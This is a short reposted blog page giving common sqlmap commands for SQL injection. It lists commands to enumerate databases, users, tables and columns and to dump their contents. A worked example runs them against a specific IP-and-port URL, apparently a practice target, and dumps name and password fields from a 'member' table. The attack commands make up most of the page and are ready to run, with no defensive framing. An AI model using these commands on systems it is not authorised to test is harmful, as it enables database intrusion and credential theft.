当前位置:网站首页>sqlmap injection tutorial common commands

sqlmap injection tutorial common commands

2022-07-31 05:53:00 not used to having you

  • sqlmap injection tutorial common commands

    sqlmap official website: sqlmap: automatic SQL injection and database takeover tool
    sqlmap documentation address: https://github.com/sqlmapproject/sqlmap/wiki/Usage
    –hh help manual in detail

  • Highlights

    sqlmap.py -u "Injection Address" --dbs // List databases
    sqlmap.py -u "Injection Address" --current-db // Current database
    sqlmap.py -u "injection address" --users // column database user
    sqlmap.py -u "injection address" --current-user // current user
    sqlmap.py -u "injection address" --tables -D ""Database" // List the table name of the database
    sqlmap.py -u "Injection address" --columns -T "Table name" -D "Database" // Get the column name of the table
    sqlmap.py -u"Injection address" --dump -C "Column name" -T "Table name" -D "Database" //Get the column information of the following table in the database

    It is best to add --level 3 --risk2 after the command, which can increase the depth and speed of scanning

  --delay=1 means to send one packet per second

  • For example:
    sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1" --dbs //Explosive library
    sqlmap.py -u"http://219.153.49.228:44109/new_list.php?id=1" -D stormgroup --tables //burst table
    sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns burst list
    sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member-C name,password --dump burst field value

Respect originality:

Loaded at: https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html

原网站

版权声明
本文为[not used to having you]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/212/202207310508481618.html

边栏推荐

猜你喜欢

随机推荐